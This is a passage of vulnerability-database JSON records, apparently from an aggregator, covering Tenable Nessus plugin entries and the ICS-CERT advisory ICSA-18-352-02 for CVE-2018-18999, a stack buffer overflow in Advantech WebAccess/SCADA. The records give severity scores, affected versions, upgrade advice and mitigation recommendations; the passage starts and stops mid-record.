"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"}, {"name": "1040582", "refsource": "SECTRACK", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securitytracker.com/id/1040582"}, {"name": "103540", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/103540"}], "immutableFields": []}], "nessus": [{"id": "SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN", "hash": "d557211c91600e9ed986462b360b4f46", "type": "nessus", "bulletinFamily": "scanner", "title": "Advantech WebAccess webvrpcs.exe IOCTL 70022 Stack Overflow", "description": "The Advantech WebAccess/SCADA Network Service (webvrpcs.exe) running on the remote host is affected by a stack-based buffer overflow condition due to improper validation of user-supplied data when processing a DCERPC request. An unauthenticated, remote attacker can exploit this, via a series of crafted requests, to execute arbitrary code.", "published": "2018-12-21T00:00:00", "modified": "2021-10-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "href": "https://www.tenable.com/plugins/nessus/119845", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "https://www.tenable.com/security/research/tra-2018-45"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-10-06T01:53:11", "history": [{"bulletin": {"id": "SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN", "hash": "1358dc6302b918be6f1b0f53711ef1b2", "type": "nessus", "bulletinFamily": "scanner", "title": "Advantech WebAccess webvrpcs.exe IOCTL 70022 Stack Overflow", "description": "The Advantech WebAccess/SCADA Network Service (webvrpcs.exe) running on the remote host is affected by a stack-based buffer overflow condition due to improper validation of user-supplied data when processing a DCERPC request. An unauthenticated, remote attacker can exploit this, via a series of crafted requests, to execute arbitrary code.", "published": "2018-12-21T00:00:00", "modified": "2021-08-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "href": "https://www.tenable.com/plugins/nessus/119845", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.tenable.com/security/research/tra-2018-45", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-08-07T16:30:56", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "ics", "idList": ["ICSA-18-352-02"]}], "modified": "2021-08-07T16:30:56", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-08-07T16:30:56", "rev": 2}}, "objectVersion": "1.6", "pluginID": "119845", "sourceData": "Binary data scada_advantech_webaccess_cve-2018-18999.nbin", "naslFamily": "SCADA", "cpe": ["cpe:/a:advantech:webaccess"], "solution": "Upgrade to Advantech WebAccess/SCADA version 8.3.4 or later.", "nessusSeverity": "", "cvssScoreSource": "CVE-2018-18999", "vpr": {"risk factor": "Medium", "score": "4.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-12-14T00:00:00", "vulnerabilityPublicationDate": "2018-12-14T00:00:00", "exploitableWith": ["Core Impact"]}, "lastseen": "2021-08-07T16:30:56", "differentElements": ["modified"], "edition": 1}, {"bulletin": {"id": "SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN", "hash": "bb78c70952adb7945700341d326ef710", "type": "nessus", "bulletinFamily": "scanner", "title": "Advantech WebAccess webvrpcs.exe IOCTL 70022 Stack Overflow", "description": "The Advantech WebAccess/SCADA Network Service (webvrpcs.exe) running on the remote host is affected by a stack-based buffer overflow condition due to improper validation of user-supplied data when processing a DCERPC request. An unauthenticated, remote attacker can exploit this, via a series of crafted requests, to execute arbitrary code.", "published": "2018-12-21T00:00:00", "modified": "2021-08-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "href": "https://www.tenable.com/plugins/nessus/119845", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999", "https://www.tenable.com/security/research/tra-2018-45", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-08-12T12:07:14", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "ics", "idList": ["ICSA-18-352-02"]}], "modified": "2021-08-12T12:07:14", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-08-12T12:07:14", "rev": 2}}, "objectVersion": "1.6", "pluginID": "119845", "sourceData": "Binary data scada_advantech_webaccess_cve-2018-18999.nbin", "naslFamily": "SCADA", "cpe": ["cpe:/a:advantech:webaccess"], "solution": "Upgrade to Advantech WebAccess/SCADA version 8.3.4 or later.", "nessusSeverity": "", "cvssScoreSource": "CVE-2018-18999", "vpr": {"risk factor": "Medium", "score": "4.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-12-14T00:00:00", "vulnerabilityPublicationDate": "2018-12-14T00:00:00", "exploitableWith": ["Core Impact"]}, "lastseen": "2021-08-12T12:07:14", "differentElements": ["nessusSeverity"], "edition": 2}, {"bulletin": {"id": "SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN", "hash": "dcce40b9ecfa835f4ec1471256d43d4a", "type": "nessus", "bulletinFamily": "scanner", "title": "Advantech WebAccess webvrpcs.exe IOCTL 70022 Stack Overflow", "description": "The Advantech WebAccess/SCADA Network Service (webvrpcs.exe) running on the remote host is affected by a stack-based buffer overflow condition due to improper validation of user-supplied data when processing a DCERPC request. An unauthenticated, remote attacker can exploit this, via a series of crafted requests, to execute arbitrary code.", "published": "2018-12-21T00:00:00", "modified": "2021-08-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "href": "https://www.tenable.com/plugins/nessus/119845", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999", "https://www.tenable.com/security/research/tra-2018-45", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-08-19T12:29:53", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "ics", "idList": ["ICSA-18-352-02"]}], "modified": "2021-08-19T12:29:53", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-08-19T12:29:53", "rev": 2}}, "objectVersion": "1.6", "pluginID": "119845", "sourceData": "Binary data scada_advantech_webaccess_cve-2018-18999.nbin", "naslFamily": "SCADA", "cpe": ["cpe:/a:advantech:webaccess"], "solution": "Upgrade to Advantech WebAccess/SCADA version 8.3.4 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2018-18999", "vpr": {"risk factor": "Medium", "score": "4.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-12-14T00:00:00", "vulnerabilityPublicationDate": "2018-12-14T00:00:00", "exploitableWith": ["Core Impact"]}, "lastseen": "2021-08-19T12:29:53", "differentElements": ["modified"], "edition": 3}, {"bulletin": {"id": "SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN", "hash": "710cef4beb4261005f4149e5ba19e90d", "type": "nessus", "bulletinFamily": "scanner", "title": "Advantech WebAccess webvrpcs.exe IOCTL 70022 Stack Overflow", "description": "The Advantech WebAccess/SCADA Network Service (webvrpcs.exe) running on the remote host is affected by a stack-based buffer overflow condition due to improper validation of user-supplied data when processing a DCERPC request. An unauthenticated, remote attacker can exploit this, via a series of crafted requests, to execute arbitrary code.", "published": "2018-12-21T00:00:00", "modified": "2021-09-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "href": "https://www.tenable.com/plugins/nessus/119845", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999", "https://www.tenable.com/security/research/tra-2018-45"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-09-15T00:51:16", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "ics", "idList": ["ICSA-18-352-02"]}], "modified": "2021-09-15T00:51:16", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-09-15T00:51:16", "rev": 2}}, "objectVersion": "1.6", "pluginID": "119845", "sourceData": "Binary data scada_advantech_webaccess_cve-2018-18999.nbin", "naslFamily": "SCADA", "cpe": ["cpe:/a:advantech:webaccess"], "solution": "Upgrade to Advantech WebAccess/SCADA version 8.3.4 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2018-18999", "vpr": {"risk factor": "Medium", "score": "4.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-12-14T00:00:00", "vulnerabilityPublicationDate": "2018-12-14T00:00:00", "exploitableWith": ["Core Impact"]}, "lastseen": "2021-09-15T00:51:16", "differentElements": ["modified"], "edition": 4}, {"bulletin": {"id": "SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN", "hash": "4a4caf0ededfd3dad68df66ce637f56f", "type": "nessus", "bulletinFamily": "scanner", "title": "Advantech WebAccess webvrpcs.exe IOCTL 70022 Stack Overflow", "description": "The Advantech WebAccess/SCADA Network Service (webvrpcs.exe) running on the remote host is affected by a stack-based buffer overflow condition due to improper validation of user-supplied data when processing a DCERPC request. An unauthenticated, remote attacker can exploit this, via a series of crafted requests, to execute arbitrary code.", "published": "2018-12-21T00:00:00", "modified": "2021-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "href": "https://www.tenable.com/plugins/nessus/119845", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999", "https://www.tenable.com/security/research/tra-2018-45"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-09-21T13:05:37", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "ics", "idList": ["ICSA-18-352-02"]}], "modified": "2021-09-21T13:05:37", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-09-21T13:05:37", "rev": 2}}, "objectVersion": "1.6", "pluginID": "119845", "sourceData": "Binary data scada_advantech_webaccess_cve-2018-18999.nbin", "naslFamily": "SCADA", "cpe": ["cpe:/a:advantech:webaccess"], "solution": "Upgrade to Advantech WebAccess/SCADA version 8.3.4 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2018-18999", "vpr": {"risk factor": "Medium", "score": "4.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-12-14T00:00:00", "vulnerabilityPublicationDate": "2018-12-14T00:00:00", "exploitableWith": ["Core Impact"]}, "lastseen": "2021-09-21T13:05:37", "differentElements": ["modified"], "edition": 5}, {"bulletin": {"id": "SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN", "hash": "be191417701cbf391e5fbef9f35d7678", "type": "nessus", "bulletinFamily": "scanner", "title": "Advantech WebAccess webvrpcs.exe IOCTL 70022 Stack Overflow", "description": "The Advantech WebAccess/SCADA Network Service (webvrpcs.exe) running on the remote host is affected by a stack-based buffer overflow condition due to improper validation of user-supplied data when processing a DCERPC request. An unauthenticated, remote attacker can exploit this, via a series of crafted requests, to execute arbitrary code.", "published": "2018-12-21T00:00:00", "modified": "2021-09-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "href": "https://www.tenable.com/plugins/nessus/119845", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999", "https://www.tenable.com/security/research/tra-2018-45"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-09-30T01:31:28", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "ics", "idList": ["ICSA-18-352-02"]}], "modified": "2021-09-21T13:05:37", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-09-21T13:05:37", "rev": 2}}, "objectVersion": "1.6", "pluginID": "119845", "sourceData": "Binary data scada_advantech_webaccess_cve-2018-18999.nbin", "naslFamily": "SCADA", "cpe": ["cpe:/a:advantech:webaccess"], "solution": "Upgrade to Advantech WebAccess/SCADA version 8.3.4 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2018-18999", "vpr": {"risk factor": "Medium", "score": "4.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-12-14T00:00:00", "vulnerabilityPublicationDate": "2018-12-14T00:00:00", "exploitableWith": ["Core Impact"]}, "lastseen": "2021-09-30T01:31:28", "differentElements": ["modified"], "edition": 6}], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "ics", "idList": ["ICSA-18-352-02"]}], "modified": "2021-10-06T01:53:11", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-10-06T01:53:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "119845", "sourceData": "Binary data scada_advantech_webaccess_cve-2018-18999.nbin", "naslFamily": "SCADA", "cpe": ["cpe:/a:advantech:webaccess"], "solution": "Upgrade to Advantech WebAccess/SCADA version 8.3.4 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2018-18999", "vpr": {"risk factor": "Medium", "score": "4.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-12-14T00:00:00", "vulnerabilityPublicationDate": "2018-12-14T00:00:00", "exploitableWith": ["Core Impact"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}], "ics": [{"id": "ICSA-18-352-02", "hash": "f516de30680abfe8ca495dccf0f4a578", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&amp;Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02>); we'd welcome your feedback.\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "href": "https://www.us-cert.gov/ics/advisories/ICSA-18-352-02", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://cwe.mitre.org/data/definitions/20.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-07-28T18:31:31", "history": [{"bulletin": {"id": "ICSA-18-352-02", "hash": "39305e58cfb4ee43554628e693369fad54beeb53218da5e45658920a9aa254e3", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&amp;Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for [control systems security recommended practices](<https://ics-cert.us-cert.gov/content/recommended-practices>) on the ICS-CERT web page. Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS-CERT website](<https://ics-cert.us-cert.gov/>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvss2": {}, "cvss3": {}, "href": "https://ics-cert.us-cert.gov//advisories/ICSA-18-352-02", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-352-02", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-18-352-02 Advantech WebAccess/SCADA&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02&site_name=ICS-CERT", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://cwe.mitre.org/data/definitions/20.html", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-18-352-02 Advantech WebAccess/SCADA&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02&site_name=ICS-CERT", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-18-352-02 Advantech WebAccess/SCADA&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02&site_name=ICS-CERT", "https://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://ics-cert.us-cert.gov/", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01", "https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "http://www.us-cert.gov/privacy/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-352-02", "https://ics-cert.us-cert.gov/content/recommended-practices", "http://www.dhs.gov", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-352-02", "http://www.dhs.gov/report-cyber-risks", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2019-01-12T12:04:03", "history": [], "viewCount": 21, "enchantments": {"dependencies": {"modified": "2019-01-12T12:04:03", "references": [{"idList": ["CVE-2018-18999"], "type": "cve"}]}, "score": {"modified": "2019-01-12T12:04:03", "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2019-01-12T12:04:03", "differentElements": ["cvss", "description", "href", "references"], "edition": 1}, {"bulletin": {"id": "ICSA-18-352-02", "hash": "9f152c40542d787f433dd9e6a53d8031bb8837a08cc120e057168eb4b863ab30", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "None\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-352-02", "reporter": 